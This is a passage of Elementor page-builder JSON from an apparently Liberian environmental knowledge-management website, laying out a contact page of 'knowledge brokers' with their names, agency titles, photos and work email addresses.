below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/IMG_20200908_105852_513.jpg\",\"id\":3167},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jeremiah Sokan Sr<\\/strong><br \\/>Coordinator Climate Change Secretariat, EPA<br \\/><a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager - Compliance and Enforcement, EPA<br \\/>jjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Kawusu Toure<\\/strong><br \\/>Assistant Manager - Compliance and Enforcement, ESIA, EPA<br \\/>kawumtoure@gmail.com<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><br \\/>EIA Manager, FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><\\/p><p>Director, MOA<\\/p><p><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager, LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b10d67e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental 